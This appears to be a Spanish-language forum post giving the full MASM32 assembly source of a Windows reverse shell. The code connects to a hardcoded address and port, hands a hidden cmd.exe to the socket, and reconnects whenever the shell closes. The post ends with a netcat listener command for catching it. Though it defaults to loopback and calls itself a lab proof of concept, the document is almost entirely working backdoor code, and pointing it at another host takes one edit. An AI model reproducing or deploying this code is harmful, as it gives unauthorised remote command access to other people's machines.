Esta es una pequeña y simple prueba de concepto de lo que sería una shell remota de conexión inversa programada con sintaxis MASM. El binario se conecta a la IP y el puerto fijados en la sección .data, lanza el intérprete de comandos con su entrada y salida redirigidas al socket y, cuando la shell termina, vuelve a conectar. El canal es TCP en claro y sin ninguna autenticación, así que solo tiene sentido para probar en local (por defecto apunta a 127.0.0.1).
Aquí dejo el código:
.386
.model flat, stdcall
option casemap:none
include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
include \masm32\include\ws2_32.inc
includelib \masm32\lib\ws2_32.lib
includelib \masm32\lib\kernel32.lib
.data
cmd db "COMSPEC",0                      ; env var that names the command interpreter (normally cmd.exe)
ip db "127.0.0.1",0                     ; listener address; loopback for lab testing, change before use
szMsgCon db "/k echo: Connected...",0   ; command line for the interpreter: keep it open, print a banner
port equ 7565                           ; listener TCP port in host order; converted with htons in .code
.data?
sinfo STARTUPINFO <>                    ; std-handle redirection + hidden window for the child shell
pinfo PROCESS_INFORMATION <>            ; process/thread handles returned by CreateProcess
sockAddr sockaddr_in <>                 ; ip:port in network form
wsaData WSADATA <>                      ; filled by WSAStartup
sock SOCKET ?                           ; the connected socket, inherited by the child as stdin/stdout/stderr
szComspec db 512 dup(?)                 ; receives %COMSPEC%; 512 must match the length passed to GetEnvironmentVariable
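.code
;-----------------------------------------------------------------------
; start — proof-of-concept reverse shell (MASM32, Win32 stdcall).
;
; Resolves %COMSPEC%, connects to ip:port (both fixed in .data), then
; launches the interpreter with stdin/stdout/stderr redirected to the
; socket. When the shell exits, the socket and Winsock are torn down
; and the whole cycle restarts, so one listener can reconnect forever.
;
; Security note: the channel is plaintext TCP with no authentication —
; anyone who can reach or impersonate ip:port gets the shell. The
; defaults point at loopback; this is lab code only.
;
; Fixes vs. the original listing: the RtlZeroMemory call was misspelled
; (RltZeroMemory, does not assemble); GetEnvironmentVariable, WSAStartup,
; WSASocket and CreateProcess return values are now checked, so a missing
; COMSPEC or a failed spawn no longer leads to waiting on / closing
; handles that were never created.
;-----------------------------------------------------------------------
start:
        ; %COMSPEC% -> szComspec. Return value is the number of chars
        ; copied: 0 = variable not set, >= buffer size = truncated. Either
        ; way CreateProcess could never succeed, so exit instead of
        ; spinning in the reconnect loop below.
        invoke  GetEnvironmentVariable, addr cmd, addr szComspec, sizeof szComspec
        test    eax, eax
        jz      __exit
        cmp     eax, sizeof szComspec
        jae     __exit

__init_sock:
        ; Winsock 2.2; a non-zero return means nothing below can work.
        invoke  WSAStartup, 202h, addr wsaData
        test    eax, eax
        jnz     __exit

        ; dwFlags = 0 -> non-overlapped socket (socket() would set
        ; WSA_FLAG_OVERLAPPED, which cannot serve as a console std handle).
        ; No WSA_FLAG_NO_HANDLE_INHERIT, so the child can inherit it.
        invoke  WSASocket, AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0
        cmp     eax, INVALID_SOCKET
        je      __fail_wsa
        mov     [sock], eax

        ; sockAddr = { AF_INET, htons(port), inet_addr(ip) }
        invoke  inet_addr, addr ip
        mov     sockAddr.sin_family, AF_INET
        mov     sockAddr.sin_addr, eax
        invoke  htons, port
        mov     sockAddr.sin_port, ax

__connect:
        ; Retry every 500 ms until the listener accepts (SOCKET_ERROR = -1).
        invoke  Sleep, 500
        invoke  connect, [sock], addr sockAddr, sizeof sockAddr
        cmp     eax, SOCKET_ERROR
        je      __connect

        ; Hidden console whose three std handles are the socket.
        ; RtlZeroMemory clobbers eax, so the socket is loaded afterwards.
        invoke  RtlZeroMemory, addr sinfo, sizeof sinfo
        mov     eax, [sock]
        mov     sinfo.cb, sizeof sinfo
        mov     sinfo.dwFlags, STARTF_USESTDHANDLES or STARTF_USESHOWWINDOW
        mov     sinfo.wShowWindow, SW_HIDE
        mov     sinfo.hStdOutput, eax
        mov     sinfo.hStdError, eax
        mov     sinfo.hStdInput, eax

        ; bInheritHandles = TRUE hands the socket to the child.
        ; NOTE(review): with lpApplicationName set, lpCommandLine is passed
        ; to the child verbatim as its full command line, and szMsgCon
        ; starts at "/k" rather than at the program name — confirm cmd.exe
        ; tolerates this, or prepend the interpreter name to szMsgCon.
        invoke  CreateProcess, addr szComspec, addr szMsgCon, 0, 0, TRUE, CREATE_NEW_CONSOLE, 0, 0, addr sinfo, addr pinfo
        test    eax, eax
        jz      __cleanup_sock          ; spawn failed: pinfo holds nothing to wait on or close

        ; Block until the shell exits, then release its handles.
        invoke  WaitForSingleObject, pinfo.hProcess, INFINITE
        invoke  CloseHandle, pinfo.hThread
        invoke  CloseHandle, pinfo.hProcess

__cleanup_sock:
        invoke  closesocket, [sock]
        invoke  WSACleanup
        jmp     __init_sock             ; new socket, reconnect

__fail_wsa:
        ; Socket creation failed after a successful WSAStartup.
        invoke  WSACleanup
__exit:
        invoke  ExitProcess, 1
end start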
Para probarlo, podéis hacer un pequeño script en Python, Perl o lo que sea que escuche en el puerto 7565, o usar directamente netcat, de la siguiente manera (con el netcat de OpenBSD la sintaxis es `nc -l 7565`, sin `-p`):
nc -l -p 7565
¡Un saludo!